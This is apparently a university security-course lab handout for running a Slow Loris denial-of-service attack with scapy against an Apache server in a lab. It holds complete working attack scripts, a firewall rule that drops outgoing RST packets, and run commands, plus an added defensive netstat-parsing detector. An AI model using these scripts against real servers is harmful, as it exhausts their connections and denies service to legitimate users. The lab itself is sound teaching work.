CNIT 123 Project X12: Slow Loris Attack with scapy (20 pts.)

What you need

Finding the IP Address of the Target Linux Machine

On the Target Linux machine, in the Terminal window, execute the ifconfig command. Make a note of your IP address for later reference.

Restarting Apache on the Target Linux Machine

On the Target Linux machine, in the Terminal window, execute this command:

service apache2 restart

Watching Network Connections on the Target Linux Machine

On the Target Linux machine (the Web server), close Firefox. In the Terminal window, execute this command:

watch "netstat -pant"

You should see a continuously updated list of network connections, as shown below on this page. Right now, there are no ESTABLISHED connections, only a listening process.

Viewing the Web Page from the Attacker Machine

On the Attacker Linux machine, open Firefox. In the Address bar, type the IP address of your Target Linux Machine. You should see the default Web page for your Apache server, as shown below on this page.

On your Target Linux machine, you should see an ESTABLISHED connection to the server on local port 80, as shown below on this page. If you don't see it, try refreshing the browser on the Attacker Linux machine.

Blocking RST Packets on the Attacker Linux Machine

As before, you must block outgoing RST packets with iptables. The attacker's own kernel knows nothing about the connection scapy is building, so when the server's SYN-ACK arrives the kernel answers it with a RST and tears the connection down; dropping outgoing RST packets keeps the handshake alive.

On the Attacker Linux Machine, open a Terminal window. In the Terminal window, execute this command:

iptables -L

If you see a rule in the OUTPUT section that drops RST packets, as shown below on this page, your firewall is correctly configured. If the rule is not there, execute this command to add it:

iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

Creating a Handshake Function on the Attacker Linux Machine

On the Attacker Linux machine, in a Terminal window, execute these commands:

cd

nano handshake.py

In the nano window, type (or copy and paste) this script:

#!/usr/bin/env python
from __future__ import print_function
import sys
from scapy.all import *

if len(sys.argv) != 3:
  print("Usage: ./handshake.py <target-ip> <source-port>")
  sys.exit(1)

target = sys.argv[1]
sp = int(sys.argv[2])

# IP layer: only the destination needs to be set; scapy fills in the rest.
i = IP()
i.dst = target
print("IP layer prepared: ", i.summary())

# Step 1 of the handshake: a SYN to port 80 from the chosen source port.
t = TCP()
t.dport = 80
t.sport = sp
t.flags = "S"
print("Sending TCP SYN Packet: ", t.summary())
ans = sr1(i/t)                  # sr1() returns the first reply: the SYN-ACK
print("Reply was: ", ans.summary())

# Step 3: ACK the server's sequence number to complete the handshake, and
# carry one byte of data so the connection shows up as ESTABLISHED.
t.seq = ans.ack
t.ack = ans.seq + 1
t.flags = "A"
print("Sending TCP ACK Packet: ", t.summary())
ans = sr(i/t/"X")

Here is an image of the script:

Save the file with Ctrl+X, Y, Enter.

On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:

chmod a+x handshake.py

./handshake.py 192.168.198.133 2000

On the Target Linux machine, you should see a connection from local port 80 to remote port 2000 appear. At first it is in the ESTABLISHED state, but it rapidly changes to a FIN-WAIT state, as shown below on this page. Capture a screen image before the connection vanishes. If it vanishes before you can capture it, run the ./handshake.py 192.168.198.133 2000 command again.

Saving the Screen Image

Make sure you can see the ESTABLISHED or FIN-WAIT connection, from local port 80 to remote port 2000.

Save a screen image with the filename Proj X12a from Your Name.

Watching Server Status on the Target Linux Machine

On the Target Linux machine, open a new Terminal window, and execute this command:

firefox localhost/server-status

You should see the Apache server status page, with only one request being processed, as shown below on this page:

Creating a Slowloris Function on the Attacker Linux Machine

On the Attacker Linux machine, in a Terminal window, execute this command:

nano slowloris.py

In the nano window, type (or copy and paste) this script. Replace YOUR NAME with your own name.

#!/usr/bin/env python
from __future__ import print_function
import sys
from scapy.all import *

if len(sys.argv) != 4:
  print("Usage: ./slowloris.py <target-ip> <starting-source-port> <number-of-GETs>")
  sys.exit(1)

target = sys.argv[1]
sp = int(sys.argv[2])
numgets = int(sys.argv[3])

print("Welcome to YOUR NAME's Slow Loris Attack with scapy!")
print("Attacking ", target, " with ", numgets, " GETs")

i = IP()
i.dst = target
print("IP layer prepared: ", i.summary())

# One handshake per source port, numgets ports in all (the original loop
# stopped one port short).
for s in range(sp, sp+numgets):
  t = TCP()
  t.dport = 80
  t.sport = s
  t.flags = "S"
  ans = sr1(i/t, verbose=0)     # the server's SYN-ACK
  t.seq = ans.ack
  t.ack = ans.seq + 1
  t.flags = "A"
  # The request is deliberately left unterminated (no blank line after
  # the headers), so the server keeps waiting for the rest of it.
  get = "GET / HTTP/1.1\r\nHost: " + target
  ans = sr1(i/t/get, verbose=0)
  print("Port ", s, " attacked!")
print("Done!")

The script looks like this (split across two images):

This script is very similar to the handshake.py script. The only changes are that it loops through many source ports and that, on each one, it sends an HTTP GET that is incomplete because it is missing the final carriage return and line feed, so the server holds the connection open waiting for the rest of the request.

On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:

chmod a+x slowloris.py

./slowloris.py 192.168.198.133 3000 1000

On the Target Linux machine, in the Firefox window, click the Refresh button every few seconds. The grid should be filling with letters, as the attack uses up all available connections.

Your screen should look like the image below on this page:
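A defender-side check for what the netstat window on the Target Linux machine shows during this attack, added here as an example (it is not part of the original lab): it parses netstat -pant output and reports any remote host holding many simultaneous ESTABLISHED connections to port 80, together with the source-port range that host occupies. The netstat sample embedded in the script is constructed, and the attacker address 192.168.198.128 is assumed.

```python
#!/usr/bin/env python
from __future__ import print_function
import sys
from collections import defaultdict

# Constructed sample of `netstat -pant` output as the Target Linux machine would
# show it during the lab (not captured from a real system): one normal browser
# connection plus a block of connections from one remote host (assumed attacker
# address 192.168.198.128) walking through consecutive source ports.
SAMPLE_NETSTAT = (
    "Active Internet connections (servers and established)\n"
    "Proto Recv-Q Send-Q Local Address      Foreign Address       State       PID/Program name\n"
    "tcp        0      0 0.0.0.0:80         0.0.0.0:*             LISTEN      1234/apache2\n"
    "tcp        0      0 192.168.198.133:80 192.168.198.1:51742   ESTABLISHED 1240/apache2\n"
    + "".join("tcp        0      0 192.168.198.133:80 192.168.198.128:%d  ESTABLISHED 1241/apache2\n" % p
              for p in range(3000, 3012))
)

def split_addr(addr):
    """Split 'host:port' into (host, port); rsplit keeps IPv6 ':::80' intact."""
    host, port = addr.rsplit(":", 1)
    return host, (None if port == "*" else int(port))

def parse_netstat(text):
    """Return one dict per TCP socket line in `netstat -pant` output."""
    conns = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue                        # banner, header and non-TCP lines
        _, lport = split_addr(fields[3])
        rhost, rport = split_addr(fields[4])
        conns.append({"local_port": lport, "remote_ip": rhost,
                      "remote_port": rport, "state": fields[5]})
    return conns

def suspicious_clients(text, local_port=80, threshold=10):
    """Return {remote_ip: (count, lowest_src_port, highest_src_port)} for every
    host holding at least `threshold` ESTABLISHED connections to local_port."""
    ports = defaultdict(set)
    for c in parse_netstat(text):
        if c["local_port"] == local_port and c["state"] == "ESTABLISHED":
            ports[c["remote_ip"]].add(c["remote_port"])
    return {ip: (len(p), min(p), max(p)) for ip, p in ports.items() if len(p) >= threshold}

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    for ip, (n, lo, hi) in sorted(suspicious_clients(text).items()):
        print("%s holds %d connections to port 80 (source ports %d-%d)" % (ip, n, lo, hi))
```

Run it without input to see the constructed sample analysed, or pipe live output into it (netstat -pant | ./watch_conns.py) on the Target Linux machine while the attack is running.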

Saving the Screen Image

Make sure you can see the grid, showing at least 10 letters.

Save a screen image with the filename Proj X12b from Your Name.

Turning in Your Project

Email the images to cnit.123@gmail.com with a Subject line of Proj X12 from Your Name.




Last modified: 5-3-14
Modified 6-28-16